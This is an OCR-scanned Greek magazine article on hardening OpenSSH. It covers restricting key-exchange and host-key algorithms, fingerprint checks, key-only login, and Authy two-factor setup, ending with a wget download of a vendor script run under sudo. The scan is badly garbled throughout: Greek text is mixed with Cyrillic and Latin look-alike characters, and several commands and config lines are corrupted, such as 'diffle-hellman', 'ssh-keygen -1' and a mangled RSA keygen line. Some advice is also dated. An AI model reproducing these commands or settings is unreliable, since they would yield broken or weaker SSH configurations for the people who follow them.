αποτελεἰ Evav τουλάχιστον EVOXANTIKO περιορισμό, εφόσον τα KAEIOIG μεγαλύτερου 
μήκους παρέχουν μεγαλύτερη ασφάλεια (θεωρητικἁ πάντα). Όσο για την τυχαιότητα 
που αναφέραμε, πρέπει να πούμε OT! αποτελεὶ Eva ακόµα μειονέκτημα του DSA. Αν 
οι τυχαίοι αριθμοί που χρησιμοποιούνται δεν εἶναι Χεντελώς3 τυχαίοι, ο αλγόριθμος 
μπορεί να опао αρκετά εὐκολα. Κάτι τἐτοιο συνέβη και µε το σπάσιμο του Play 
Station 3, ӧтау η ομάδα fail0verflow ἑσπασε τον αλγόριθμο που χρησιμοποιούσε η 
SONY για την υπογραφἡὴ των παιχνιδιών. 


Μήπως αναρωτιέστε пос σχετίζονται αυτὲς οι αδυναμἰες µε το θέµα µας; E, λοιπὀν, 
ΤΟ OpenSSH, η πλέον διαδεδομένη υλοποίηση του SSH, υποστηρίζει όλους τους 
αλγόριθμους που αναφέραμε προηγουμένως. Μάλιστα, κάποιοι апо αυτούς Χρησιµο- 
ποιοῦνται εξ ορισμού. 


Ἔγκαιρη αντιμετώπιση 


Όπως εἰπαμε αρχικά, οι συνδέσεις SSH φαίνεται ὁτι δεν διατρέχουν κἀποιον ἆμεσο 
κίνδυνο. Ωστόσο, το γεγονός бт! TO OpenSSH υποστηρίζει ἡ και χρησιμοποιεί opi- 
σμένους ευπαθεἰς αλγόριθμους, επιβάλλει τη λήψη Evoc προληπτικού μέτρου: Την 
άμεση αντικατάσταση ὁλων των προβληματικὠν αλγορίθμων, πριν εμφανιστούν εξε- 
λιγμένες και πιο апоботікёс̧ επιθέσεις. AUTH η προτροπἠ ὁμως μπορεὶ να οδηγήσει 
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σ' ἑνα vo npoBAnua. Τα τελευταία χρόνια και ιδιαίτερα µετά апо τις αποκαλύψεις 
Snowden, ¿xouv φουντώσει τα σενάρια που αμφισβητούν την ασφάλεια *OAWV* των 
αλγορίθμων κρυπτογράφησης. Όπως αντιλαμβάνεστε, πολλά апо αυτά που ακού- 
γονται και γράφονται αποτελούν θεωρίες συνωμοσίας και, κατὰ κύριο λὀγο, αποκυ- 
ната της φαντασίας. Ακόμα κι αν υπάρχει µια δόση αλήθειας σε κάποιες апо τις 
φήμες που κυκλοφορούν, το μόνο που μπορούμε να κάνουµε ως λογικοἱ ἄνθρωποι 
εἶναι να στηριχτούµε στα γεγονότα κι OXI στις εικασίες. 


Στη συνέχεια θα δούμε τις ρυθμίσεις που πρέπει να πραγματοποιήσουμε στο 
OpenSSH, ώστε να ελαχιστοποιήσουμε την πιθανότητα αποκρυπτογράφησης των 
συνδέἐσεὼν µας. Πριν προχωρήσουμε, орос, πρέπει να σταθούμε σε µια λεπτομὲ- 
ρεια: To Debian Χρησιμοποιεί µια σχετικά παλιά ἐκδοση του OpenSSH. Πρόκειται για 
µια δοκιμασμένη και σταθερἡ ἐκδοση, η опоіа όμως δεν προσφέρει τις επιλογἐς που 
συναντάμε στις νεότερες εκδόσεις. Π' αυτό το λόγο, αν χρησιμοποιείτε Debian ἡ Kå- 
ποια συγγενικἠ διανομὴ, θα χρειαστεἰ va αναβαθμίσετε το OpenSSH για να праүра- 
τοποιήσετε τις ρυθμίσεις που προτείνουμε. Κάτι τἐτοιο προὐποθέτει την προσθήκη 
του repository µε TOV χαρακτηρισμὀ "backports". Συγκεκριµένα, αν χρησιμοποιούμε 
το Debian wheezy (την πιο πρὀσφατη σταθερὴ ἐκδοση του Debian), πρέπει να npo- 
σθἐσουµε το αποθετἠριο ονόματι wheeze-backports. Το εν λόγω repository παρέχει 
πρόσβαση στα πακέτα που θα διαθέτει το default repository της жєпор=упс̧* oTa- 
θερἠς ἐκδοσης Debian. Πα την προσθήκη του wheezy-backports πρέπει να κάνουμε 
µια μικρή επέμβαση στο αρχεὶο /etc/apt/sources.list: 


$ sudo nano /etc/apt/sources.list 
Κάτω апо Ta repository που θα βρούμε eksi, θα προσθέσουμε Tnv ακόλουθη γραμμή: 
deb http://ftp.debian.org/debian/ wheezy-backports main non-free contrib 


Στη συνέχεια, арке! να ενημερώσουμε τη βάση δεδοµένων του apt-get, vq катарүй- 
σουµε πλήρως την пала εγκατάσταση του OpenSSH και να το εγκαταστήσουμε EK 
νέου - αυτή τη φορά апо το VEO repository: 


$ sudo apt-get update 
$ sudo apt-get purge openssh-server 
$ sudo apt-get -t wheezy-backports install openssh-server 


Τέλος, θα ἦταν χρήσιμο να κάνουμε και µια μικρὴ διευκρίνιση. Αν ρἰξετε µια ua- 
Tia στον κατάλογο /etc/ssh θα διαπιστώσετε ὁτι περιλαμβάνει τα αρχεία PUBLICE- 
ων ssh_config και sshd_config. Το περιεχόμενο του πρώτου αρχείου καθορίζει τους 
όρους µε τους οποίους πραγματοποιούνται οι "εξερχόμενες" συνδέσεις, δηλαδή οι 
συνδέσεις που ξεκινάμε µε δικἠ µας πρωτοβουλία προς ἆλλα μηχανήματα. O! ρυθμἰ- 
σεις του δεύτερου αρχείου (sshd_config) αφορούν στο δαΐμονα (daemon) του SSH 
ἡ πιο апла στον SSH server κι επηρεάζουν τις εισερχόμενες συνδέσεις. Ας δούμε TIC 
προτεινόμενες ρυθμίσεις, εξετάζοντας βήμα προς βήμα τη δημιουργία µιας σύνδεσης 
SSH. 


Κλειδί κρυπτογράφησης 


Οι συνδέσεις SSH ξεκινούὐν πάντα µε τη λεγόμενη ανταλλαγή κλειδιών (key 
exchange). Όταν ολοκληρωθεἰ αυτἠ η διαδικασία, τα δύο συστήµατα που επιχειρούν 
τη σύνδεση ἐχουν αποκτήσει vav KOIVO μυστικὀ αριθμὀ. Апо αυτὸν τον αριθµό npo- 
κύπτει το κλειδὶ της κρυπτογράφησης, που χρησιμοποιείται αργότερα για την про- 
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pvar@crunchbang: - 


Την πρώτη фора που θα συνδεθούµε σε κάποιον 
SSH server, το πρόγραμμα ζητά να επιβεβαιώσουμε 
το fingerprint του δημόσιου κλειδιού του server. 


στασἰα όλων των μηνυμάτων. Σημειώστε тора бт! η Napaywyn του κλειδιού επιτυγ- 
χάνεται µε τη βοήθεια ενὸς αλγόριθμου hashing. To OpenSSH υποστηρίζει αρκετὲς 
παραλλαγὲς αυτής της διαδικασίας, καθεμία ano τις οποἰες στηρἰζεται σε διαφορετι- 
KÓ αλγόριθμο για την ανταλλαγἠ κλειδιών και διαφορετικὀ αλγόριθμο hashing. Па va 
δείτε ποιοι συνδυασμοί αλγορίθμων υποστηρἱζονται εξ ορισμού, арке! να ανατρέξετε 
στη σελἰδα 5 και στην ενότητα KexAlgorithms, του man page του ssh_config: 


$ man ssh_config 5 


Όπως 8a διαπιστὠσετε, σε oxšon µε TO hashing To OpenSSH επιτρέπει τη χρήση 
του προβληματικού ЅНА1. Επιπρόσθετα, για την ανταλλαγἡ των κλειδιών υποστηρί- 
ζει και μερικὲς παραλλαγὲς του αλγορίθμου ЕСОН (Elliptic Curve Diffie-Hellman) οι 
οποίες προέρχονται ano το NIST (National Institute of Standards and Technology). 
Το gv λὀγω ινστιτούτο Φημολογείται бт! εμπλέκεται σε διάφορα σχέδια της NSA. 
Δεν θα δώσουμε βάση στις φήμες – δεν χρειάζεται, δηλαδἠ. Θα σταθούμε орос σε 
γεγονότα. Το NIST στο παρελθὸν εἶχε προτείνει µια τροποποίηση σ' ἑναν αλγόριθμο 
παραγωγἠς τυχαίων αριθμών, η οποία συσκὀτιζε και σχεδὸν GNEKPUNTE τις αδυναμἰ- 
ες του εν λόγω αλγορίθμου. Ανεξάρτητα апо το αν αυτή η πρὀταση ἐγινε µε δόλο ἡ 
OXI, πρὀκειται για µία κίνηση που θέτει UNO σοβαρή αμφισβήτηση την αξιοπιστία του 
NIST. Μπορείτε να διαβάσετε περισσότερα εδώ: https://projectbullrun.org/dual-ec/ 
standard-change.html. 


Τελικά, αν απορρἰψουµε οποιονδήποτε αλγόριθμο ἐχει σχεδιαστεἰ µε TIC οδηγἱες TOU 
NIST, ὁπως και τη χρήση του ξεπερασμένου SHA1, απομένουν ελάχιστοι συνδυα- 
сроі. Πα να εξασφαλίσουµε От! ὀλες οι εισερχόὀµενες συνδέσεις θα πραγµατοποι- 
οὗνται µε τους ασφαλεὶς! αλγορίθμους, арке! να ανοἰξουµε το sshd_config και να 
προσθέσουμε στο τέλος του την ακόλουθη γραμμή: 


1. Τουλάχιστον για την wpa ;) 
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KexAlgorithms curve25519-sha256@libssh.org, diffie-hellman-group-exchange- 
sha256 


Па τις εξερχόµενες συνδέσεις πρέπει να ανοίξουμε то ssh_config, να εντοπίσουµε 
την ενότητα που αφορά ὀλεςτις συνδέσεις προς οποιοδήποτε σύστημα (Host *) και 
να προσθέσουμε στο τέλος της την ἰδια γραμμή: 


Host * 


KexAlgorithms curve25519-sha256@libssh.org, diffle-hellman-group-exchange- 
sha256 


Κάπου εδὠ πρέπει να σημειώσουμε OT! υπάρχουν ορισμένες δημοφιλείς υπηρεσὶες 
που δεν xouv εγκαταλείψει τη χρήση του SHA1. Χαρακτηριστικό παράδειγμα ano- 
τελεἰ το GitHub. Ὅσοι χρησιμοποιούμε τέτοιες υπηρεσίες, πρέπει να δημιουργήσουμε 
µια ενότητα εντὸς του ssh_config που θα αφορά στις συγκεκριμένες συνδέσεις και 
θα επιτρέπει τη χρήση του SHA1. Μέσα σ' αυτή την ενότητα πρέπει να επιτρέψουμε 
και τη χρήση του SHA1. Πα παράδειγµα, αν ὀντως χρησιμοποιούμε το GitHub, прё- 
πει να ανοίξουμε To ssh_config και να προσθέσουμε στο τέλος του τις ακόλουθες 
γραμμές: 


Host github.com 


KexAlgorithms curve25519-sha256@libssh.org, diffle-hellman-group-exchange- 
sha256, diffie-hellman-group-exchange-sha1, diffie-hellman-group14-sha1 


Ταυτοποΐίηση προσώπων 


Μετὰ την ανταλλαγἠ των κλειδιών, ακολουθεἰ η πιστοποίηση του server. Βλέπετε, 
Πρέπει µε κάποιον τρόπο να επιβεβαιωθεί η ταυτότητα του μηχανήματος, ὥστε να 
αποφευχθεὶ το ενδεχόμενο µιας επίθεσης Man-in-The-Middle. O σχετικὸς ἐλεγχος 
πραγματοποιείται ως εξἠς: Κάθε φορά που συνδεόμαστε σε κἄποιο μηχάνημα, Adu- 
βάνουμε το δημόσιο κλειδὶ TOU Server, ὁπως επἰσης και To fingerprint του δημόσιου 
κλειδιού. Στη συνέχεια, то сустра µας στέλνει Eva σύντομο ερώτημα που ονομά- 
ζεται challenge και εἶναι κρυπτογραφημένο µε то δημόσιο κλειδί του server. Εφόσον 
το δημόσιο κλειδὶ ανήκει πράγματι στο server нє TOV ONOIO θέλουμε να συνδεθούμε, 
μόνο αυτὸς θα μπορεὶ να αποκρυπτογραφήσει το ερώτημα (>.T.E. διότι *uovov* au- 
τὸς διαθέτει το αντίστοιχο ιδιωτικὀ κλειδί). Επομένως, αν πάρουμε σωστὴ απάντηση 
το σύστημα θεωρεἰ ὁτι EXE! συνδεθεί µε το επιθυμητὸ μηχάνημα κι OX! µε κἄποιον 
επιτιθέµενο που ἐχει παρεισφρήσει στη σύνδεση. 


Ἔλεγχος µε το fingerprint 


Δεν ξέρουμε αν то προσέξατε, αλλά η διαδικασία που περιγράψαμε φαίνεται να 
ἐχει Eva KEVO: Πώς рпорєі να γνωρίζει ο υπολογιστής µας бт! το δημόσιο κλειδὶ 
που ἐλαβε ανήκει στ' αλήθεια στο μηχάνημα µε το οποίο θέλουμε να συνδεθού- 
με; Θα μπορούσε κάλλιστα να ανἠκει σε κάποιον επιτιθἐµενο! Н αλήθεια εἶναι 
ότι то σὐστημά µας *dev* рпорєі να επιβεβαιώσει αυτόματα την εγκυρότητα του 
δημόσιου κλειδιού. Αυτὸς ο ἐλεγχος γίνεται апо το χρήστη, ката την πρώτη” 
σύνδεση στον εκάστοτε Server. Ακριβώς, γι’ αυτό, μαζὶ µε TO δημόσιο κλειδὶ ano- 
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στέλλεται και To fingerprint. Ката την πρώτη σύνδεση, το σύστημα προβάλλει то 
fingerprint που λαμβάνει και μάς ζητά να επιβεβαιώσουμε την EYKUPOTNTA του. 
Αν απαντήσουμε θετικἀ, To fingerprint αποθηκεύεται μόνιμα στο αρχείο ~/.ssh/ 
known_hosts. Έτσι, ката τις επὀµενες συνδέσεις µας στο συγκεκριµένο server, 
το σὐστημά µας θα γνωρίζει αν ἐλαβετο σωστὸ δημόσιο κλειδὶ ἡ όχι. Αλλα σ' αυτὀ 
το σηµείο ενδέχεται να προέκυψαν δύο νέα ερωτήματα: Пат! ερωτούµαστε για 
την εγκυρότητα του fingerprint του δημόσιου κλειδιού και OX! για то ἰδιο το δηµό- 
aio κλειδί; Πῶς μπορούμε να πληροφορηθούμε το fingerprint ενός μηχανήματος; 
H απάντηση στο прото ερώτημα εἶναι απλή. Το δημόσιο κλειδὶ εἶναι συνήθως 
αρκετἁ μεγάλο και θα ἦταν δύσκολο για vav ἄνθρωπο να ελέγξει την EYKUPO- 
τητά του. Αντίθετα, To fingerprint εἶναι σχετικἁ μικρὸ και µπορεί να επαληθευτεὶ 
ευκολότερα. Ano όλα τα παραπάνω, αναδεικνύεται η μεγάλη προσοχὴ που πρέπει 
να επιδεικνύουµε κατὰ την πρώτη σύνδεση σε κἄποιο μηχάνημα. Ας περάσουμε 
όμως και στο επόμενο ερώτημα. Пос μπορούμε va επιβεβαιώσουμε την εγκυρὀτη- 
τα του fingerprint; O µοναδικὸς ασφαλἠς τρόπος εἶναι να πάρουμε To fingerprint 
του Server και να то αντιπαραβάλουμµε µε αυτὀ που λάβαμε. Ωραία, θα σκεφτείτε, 
αλλά πὼς μπορούμε να "πάρουμε To fingerprint Tou server"; (Σ.τ.Ε. Εἶμαι βέβαιος 
ότι εδώ ακριβώς ο αρθρογράφος Kave air-quotes.) Κατ' αρχάς, στην ιδανικἠ nepi- 
πτωση, πρέπει να βρεθούμε μπροστὰ апо το εν λόγω μηχάνημα, WOTE να εἴμαστε 
βέβαιοι ὁτι ἐχουμε αποφύγει το ενδεχόμενο µιας επίθεσης MitM. Ano 'κεἰ και πέρα, 
αρκεἰ να ανοίξουμε µια κονσόλα και να δώσουμε κάτι τέτοιο: 


$ sudo ssh-keygen -1 -f /etc/ssh/ssh_host_rsa_key.pub 


Με αυτόν τον τρόπο θα εμφανιστεὶ To fingerprint του δημόσιου κλειδιού του un- 
χανήματος. Στην ιδανικἠ περίπτωση πάντα, πρἐπει να σημειώσουμε τη συγκεκρι- 
μένη τιμή κι ὁταν αργότερα συνδεθούμε στο μηχάνημα µέσω SSH, να την αντι- 
παραβάλουµε µε то fingerprint που λάβαμε... Αν έχετε αρχίσει να δυσανασχετεῖτε, 
σας καταλαβαίνουμε. Н ασφάλεια όμως απαιτεἰ θυσίες ;) 


Στη διαδικασἰα που περιγράψαμε κάναμε λὀγο για το δημόσιο κλειδὶ του server, 
το αντἰστοιχο ιδιωτικὀ και τη δημιουργία ενὸς fingerprint. Όπως υποψιάζεστε, то 
OpenSSH υποστηρίζει αρκετούς συνδυασμούς αλγορίθμων γι’ αυτὲς τις εργασἰες. Av 
θέλετε να δεἰτε ποιοι χρησιμοποιούνται εξ ορισμού (καθώς και τη σειρἀ προτίμησης) 
µπορείτε να ανατρέξετε πάλι στο man page του 55η «οπῇᾳ, στη σελἰδα 5 και στην 
ενότητα HostKeyAlgorithms. Από τους συνδυασμούς που θα συναντήσετε εκεἰ, θε- 
ωρούμε ασφαλέστερους τους "Ed25519 µε SHA512" και "RSA με ЅНА1". H δεύτερη 
επιλογἡ μπορεἰ να σὰς pavzi παράλογη, αφού όπως έχουμε πει ο αλγόριθμος SHA1 
θεωρείται τρωτὸς. Ωστόσο, η συμβολὴ του αλγορίθμου hashing στη διαδικασἰα που 
εξετάζουμε δεν εἶναι κρίσιμη. Εξυπηρετεἰ μόνο στη δικἠ µας διευκόλυνση, για την 
αρχικἡ επαλήθευση του δημόσιου κλειδιού. O λόγος για τον опоіо απορρἰπτουµε 
τους υπόλοιπους συνδυασμούς αλγορίθμων εἰναι πολύ απλός: Πρὀκειται για алүо- 
ρίθμους που έχει σχεδιάσει ἡ προτείνει το αναξιόπιστο NIST. Πα να εξασφαλίσουµε 
ότι ο Ἀδικός рас̧* SSH server θα υποστηρίζει μόνο τους παραπάνω δύο συνδυασμούς 
αλγορίθμων, πρέπει να ανοίξουμε To sshd_config, να σβήσουμε ὀλεςτις γραμμὲς που 
ξεκινούν µε το "HostKey" και στη θέση τους να προσθέσουμε τις ακόλουθες δύο: 


HostKey /etc/ssh/ssh_host_ed25519_key 
HostKey /etc/ssh/ssh_host_rsa_key 
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Φυσικά, μετὰ апо αυτή τη ρύθμιση πρέπει να δημιουργήσουμε τα αντίστοιχα ζεύγη 
κλειδιῶν, ὁπως επἰσης και να επανεκκινήσουµε τον SSH server: 


$ cd /etc/ssh 
$ sudo ssh-keygen -t ed25519 -f ssh_host_ed25519 key < /dev/null 
$ sudo ssh-keygen -t rsa -b 4096 -f ssh_host_rsa_key < /dev/null 


$ sudo service ssh restart 


Όπως αντιλαμβάνεστε, για το ξεκἱνημα µιας σύνδεσης SSH δεν арке! η niotonoin- 
ση του server. Εἶναι προφανὲς ὁτι θα πρέπει να πιστοποιηθεἰ και η ταυτότητα του 
client, δηλαδὴ του χρήστη που επιχειρεἰ τη σύνδεση. Παραδοσιακά, αυτός ο έλεγχος 
πραγματοποιείται µε τη βοήθεια ενὸς password. Ωστόσο, µια που εξετάζουμε το пос 
θα θωρακίσουμε τις συνδέσεις SSH, πρέπει να πούμε оті η χρήση password *бєу* 
αποτελεί την ασφαλέστερη λύση. 


pvar@crunchbang: - 


Αν αλλάξει το δημόσιο κλειδί ενὀς server στον οποίο έχουµε συνδεθεί ка! στο παρελθὀν, το 
прӧүрацџа θα µας ενημερώσει OXETIKG και θα τερματίσει τη σύνδεση προκειµένου να ano- 
φευχθεί το ενδεχόμενο επίθεσης Man-in-The-Middle. Ταυτόχρονα, θα µας ενημερώσει για 

το αρχείο και τη γραμμή ὁπου ἔχει αποθηκευτεί το δημόσιο κλειδί του εν λόγω server. Αν η 
αλλαγή του κλειδιού συνέβη στ' αλήθεια και δεν δεχόμαστε επίθεση, θα πρέπει να σβήσουμε TO 
αποθηκευμένο κλειδί Kal να αποπειραθούµε να συνδεθούμε ξανά. 


Αυξημένη ασφάλεια 


Μπορεἰ να χρησιμοποιούμε πάντοτε ισχυρά passwords και να µην κινδυνεύουµε апо 
τις επιθέσεις brute force, αλλά σε αυτὀ το ἆρθρο προσπαθούμε va αυξήσουμε την 
ασφάλεια των συνδέσεων SSH µε κάθε τρόπο. Παλεύουμε µε τη λεπτομέρεια και 
δεν θα αφήσουμε το παραμικρὀ περιθώριο για τους επιτιθέµενους. Ακριβώς γι’ αυτὸ 
συνιστούμε την κατάργηση της ταυτοποίησης µε κἄποιο συνθηματικὀ και τη χρήση 
ενὸς ζεύγους δηµόσιου-ιδιωτικού κλειδιού. H σύνδεση και η ταυτοποίηση του xph- 
στη µε αυτή τη μέθοδο ονομάζεται "password-less login" και μοιάζει µε τη διαδικασἰα 
που εἶδαμε νωρίτερα, για την ταυτοποίηση του server. Μόνο που εδὠ, το δημόσιο 
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κλειδὶ μεταφέρεται μία фора προς τον server - και μάλιστα "χειροκίνητα". Με αυτόν 
τον τρόπο, о server θεωρεἰ ὁτι διαθέτει το σωστό δημόσιο κλειδὶ (το δικὀ µας) και 
το χρησιμοποιεί για να κρυπτογραφεὶ τα λεγόμενα challenges. 


Για να ενεργοποιήσουµμε τον παραπάνω μηχανισμὸ ταυτοποίησης, πρέπει να ξεκινή- 
σουµε φτιάχνοντας Eva προσωπικὀ ζεύγος κλειδιὼν. Όπως εἶπαμε ἠδη, το δημόσιο 
κλειδί θα μεταφερθεί στον Server, ενὠ το ιδιωτικὀ κλειδὶ πρέπει να μείνει στον δικὀ 
μας υπολογιστή και μόνο. Στη συνέχεια οφείλουμε να τροποποιήσουµμε κατάλληλα 
τις ρυθμίσεις του SSH server, καθὼς και του μηχανήματος апо το οποίο θα праүра- 
τοποιούμετις συνδέσεις προς τον server. Ας πάρουμε τα πράγματα µε τη σειρὰ κι ας 
δούμε пос μπορούμε να δημιουργήσουμε Eva ζεύγος κλειδιών: 


$ ssh-keygen -t г<а -b 4096 -ᾱ 100 


Όπως βλέπετε, επιλἐξαµε τη δηµιουργία κλειδιὼν µε τον αλγόριθμο RSA κι ορἰσαµε 
ως μήκος τα 4096 bits. Σημειώστε ὁτι το προγραμματάκι ssh-keygen θα ζητήσει να 
εισάγουµε va passphrase για την προστασία του ιδιωτικού κλειδιού. AUTO το βήμα 
θεωρείται αρκετά σημαντικὀ για την ασφάλεια του εν λὀγω κλειδιού και κατ' επἐ- 
κταση για την ασφάλεια των συνδέσεων SSH που θα πραγματοποιούµε αργότερα. 
Кало θα ἧταν να χρησιμοποιήσετε κἄποιο ισχυρὀ συνθηματικὀ. Έχετε орос υπόψη 
ότι σε αρκετὲς περιπτώσεις η χρήση συνθηματικού δεν εἶναι επιθυμητή, ειδικἁ όταν 
θέλουμε οι συνδέσεις SSH να γἰνονται αυτόματα και χωρίς καμία αλληλεπίδραση 
UE το χρήστη. Тора, για τη µεταφορά του δημόσιου κλειδιού στον server аркі να 
δώσουμε κάτι τέτοιο: 


$ ssh-copy-id <username>@<host> 


Προφανώς, στη θέση του <host> πρέπει να δώσουμε τη διεύθυνση του (αποµακρυ- 
σμένου) server, ενώ στη θέση του <username> πρέπει να βάλουμε το буора χρήστη 
στον "απομακρυσμένο" λογαριασμὀ. Αφού ολοκληρωθεί η µεταφορά του κλειδιού, 
μπορούμε να προχωρήσουμε στις ρυθμίσεις που απενεργοποιούν την ταυτοποίηση 
µε password. Στον server και μέσα στο αρχείο sshd_config πραγματοποιούμε τις 
ακόλουθες ρυθμίσεις: 

PasswordAuthentication no 

PubkeyAuthentication yes 

RSAAuthentication yes 


Αντίστοιχα, στο σύστημα апо το οποίο θα πραγματοποιούµε τις συνδέσεις, πρέἐπει 
να ανοἰξουµε το αρχείο ssh_config, να μεταβούμε στην ενότητα Host * και va npo- 
σθέσουµε τα εξής: 


Host * 


PasswordAuthentication no 
PubkeyAuthentication yes 


Νομίζουμε бт! η ερμηνεία των παραπάνω εἶναι πασιφανἠς. Αφού ολοκληρώσουμε 
τις ρυθμίσεις, арке! να επανεκκινήσουμε τον SSH server και στα δύο μηχανήματα, 
δίνοντας, N.X., κάτι τέτοιο: 


$ sudo service ssh restart 
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Meta ano τα παραπάνω, κάθε φορά που θα επιχειρούµε µια σύνδεση μεταξὺ των 
συγκεκριμένων δύο συστημάτων, θα εἶναι αρκετό να δίνουμε TO passphrase που 
προστατεύει то ιδιωτικὀ µας κλειδί. Σε ὁτι αφορά στην ευκολία δεν θα έχει αλλάξει 
τίποτα, αλλά η ασφάλεια θα ἐχει αυξηθεἰ κατακόρυφα! Σκεφτεἰτε ὁτι TO passphrase 
απαιτεἰται για τη χρήση του ιδιωτικού κλειδιού апо το δικὀ µας σύστημα κι όχι апо 
τον Server. Επομένως, ο τελευταίος δεν περιμένει κανένα συνθηματικὀ κι ара δεν 
κινδυνεύει καθόλου ano επιθέσεις ΜΙΤΜ. Ano την ἄλλη, ὁπως αναφέραμε και npo- 
ηγουμένως εἶναι πιθανὸ να µην έχουμε ορἰσει passphrase για το ιδιωτικὀ κλειδὶ. Σ' 
αυτή την περίπτωση, η σύνδεση στον απομακρυσμένο OpenSSH server θα γίνεται 
ακόµα πιο γρήγορα. 


Οι διαθέσιμοι συνδυασμοί αλγορίθμων για τη δημιουργία 
ενὀς ζεύγους κλειδιών και την παραγωγή του fingerprint. 


Πρόσθετη δικλεῖδα ασφαλείας 


Αν ανησυχεἰτε για το ката πόσο µπορεί να διατηρηθεἰ ασφαλές το ιδιωτικὀ σας κλειδὶ 
ἡ για την προστασία που προσφέρει το passphrase που πιθανώς το προστατεύει, 
μπορείτε να επιστρατεύσετε ἑναν ακόμα μηχανισμὀ ασφάλειας. Пос θα σας φαινό- 
ταν αν μετατρέπατε TO smartphone σας σε authentication token, π.χ., σαν αυτά που 
δίνουν οι τράπεζες; Αναφερόμαστε στις μικρὲς συσκευὲς που παράγουν κατάλληλα 
"κατασκευασμένους" αριθμούς, τους οποίους δίνουμε στο σύστημα της τράπεζας 
μαζὶ µε τα στοιχεία µας. Οι συγκεκριμένοι αριθμοί λειτουργούν ως Eva πρὀσθε- 
το πιστοποιητικὀ της ταυτότητάς µας, αφού προέρχονται апо την προσωπικἠ µας 
συσκευἠ που υποτίθεται ὁτι δεν την Χρησιμοποιεί κάποιος ἄλλος. AUTH η μέθοδος 
ταυτοποίησης του χρήστη µε δύο διαφορετικοὺς τρόπους ονομάζεται "two-factor 
authentication". 


Μια υπηρεσία που μπορεί να μετατρέψει To smartphone µας σε authentication token 
όσον αφορά στις συνδέσεις SSH, εἶναι n Authy (https://www.authy.com). Ξεκινάμε, 
βεβαίως, εγκαθιστώντας την ομώνυμη εφαρμογἠ στη συσκευἠ µας. Σημειώστε От! 
την πρὠτη фора που θα την τρέξουμε, θα χρειαστεὶ να ακολουθήσουμε µια σύντο- 
μη διαδικασία προκειµένου να "συνδέσουμε" τον τηλεφωνικὀ µας αριθμὀ µε Evav 
προσωπικὀ λογαριασμὸ email. Ουσιαστικά, µε GUTOV τον τρόπο αποδεικνύουµε От! 
μας ανήκει ο τηλεφωνικόὸς αριθμός *ка* η συσκευἠ. Όταν ξεµπερδέψουµε μ' αυτά 


32 


Ησφαλέστερο OpenSSH, εδώ και τώρα! 
κκ κκ 


pvar@crunchbang: - 


Η µεταφορά του προσωπικού µας δηµόσιου κλειδιού µπορεί να 
γίνει εντελώς "χειροκίνητα" ἡ µε τη βοήθεια του εξειδικευμένου 
εργαλείου ssh-copy-id. 


τα апла βήματα, το τηλἐφωνόὀ µας θα µπορεί να λειτουργήσει σαν εκείνες τις pl- 
κρὲς συσκευές των τραπεζών. Όμως, για να µας Φανεὶ χρήσιμη αυτή τη λειτουργία 
πρέπει να εγκαταστήσουµε την υπηρεσία Authy και σε κἄποιον SSH server. Έτσι, 
το επὀµενο βῆμα εἶναι να μεταβούμε στο δικτυακό τόπο της υπηρεσίας και να δημι- 
Ουργήσουμε Evav λογαριασμὀὸ τύπου "developer". AUTO рпорєі να γἰνει борау ano 
ΤΟ https://dashboard.authy.com/signup. H δημιουργία αυτού Tou τύπου λογαριασμού 
εἶναι απαραἰτητη, προκειµένου ν' αποκτήσουμε πρόσβαση στο АРІ της υπηρεσίας και 
να εἶμαστεσε θέση να το αξιοποιήσουµε σε ὀποιους SSH server θέλουμε. Σημειώστε 
ότι για την ολοκλήρωση του λογαριασμού θα λάβουμε κι Eva email, εντὀςτου οποίου 
θα βρούμε Eva confirmation link. 


Όταν συνδεθούμε στην υπηρεσία Authy για πρώτη φορά, θα ξεκινήσει ἑνας οδηγὀς 
για τη δηµιουργία µιας εφαρμογἠς. H έννοια του ὁρου "εφαρμογή" θα ξεκαθαριστεἰ 
αργότερα και δεν υπάρχει λὀγος να προβληματιστούμµε σ' αυτή τη φάση. Στο прото 
βήμα του οδηγού καλούμαστε να δώσουμε Eva буора. Па δικἠ µας διευκόλυνση, 
βολεύει να δώσουμε то буора που EXE! και το μηχάνημα στο οποίο θα αξιοποιήσουμε 
την υπηρεσία Authy. Στο επόμενο βῆμα, θα ερωτηθούµε για τους χρήστες που 8š- 
AOUHE να διαχειρίζονται τη συγκεκριμένη εφαρμογἠ. Εδὠ μπορούμε να πατήσουμε 
το κουμπάκι Skip, καθὼς δεν πρὀκειται να αναμείξουμε κανέναν ἄλλον. Θυμηθείτε 
ότι όλα αυτά γίνονται για να προσθέσουμε Evav ακόµα μηχανισμὸὀ ασφαλείας στις 
συνδέσεις µας! Στο τρίτο βήμα εμφανἰζεται µια λίστα µε τα προγράµµατα που ou- 
νεργάζονται µε την υπηρεσία Authy. Κάθε στοιχεἰο της λίστας αποτελεἰ και µια na- 
ραπομπἠ προς τη σχετικἠ τεκμηρίωση και θα ἦταν кало να ρίξουμε µια ματιὰ για 
ν' αποκτήσουμε τη γενικὴ εικὀνα. Στο τέταρτο και τελευταἰὶο βήμα εμφανίζεται то 
λεγόμενο API key της εφαρµογἠς που μόλις δημιουργήσαμε. Όπως αντιλαμβάνεστε, 
αυτή η συμβολοσειρά θα µας φανεὶ χρήσιμη πολὺ σύντομα. 
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pvar@dhvnet-debian: ~ 
arch Terminal Help 


usr/local/bin/authy-ssh... 


rating ini 
ng 'ForceC nd /us L/bin 


MAKE SURE YOU DO NOT MOVE/REMOVE /usr/local/bin/authy-ssh BEFORE UNINSTALLING AUTHY SSH 


Πα την εγκατάσταση του Authy σε κάποιον SSH server προσφέρεται Eva ειδικὀ 
script апо τους ἰδιους τους δημιουργούς της υπηρεσίας. Αφού το εκτελέσουμε, 
πρέπει να δώσουμε то API key που πήραμε ano το δικτυακὀ τόπο της υπηρεσίας. 


Σ' αυτὸ το στάδιο έχουμε ξεμπερδέψει µε την υπηρεσία Authy και τους διάφορους 
λογαριασμούς που απαιτούνται. Απομένει η κατάλληλη ρύθμιση του SSH server, 
στον опоіо θέλουμε να προσθέσουμε τη δικλεἰδα µε το authentication token. Π' 
αυτή την εργασία, ὁπως και για κάθε ἄλλη λειτουργία που θα επιτελεί то Authy στο 
σὐὑστημά µας, διατίθεται Eva script. Αρχικά, πρέπει να συνδεθούµε στο μηχάνημα µε 
τον SSH server και να το κατεβάσουμε εκεί: 


wget "https://raw.github.com/authy/authy-ssh/master/authy-ssh" 

Μετὰ το καθιστούµε εκτελέσιμο και το τρέχουμε µε παράμετρο τη λέξη install: 
$ chmod 755 authy-ssh 
$ sudo authy-ssh install 


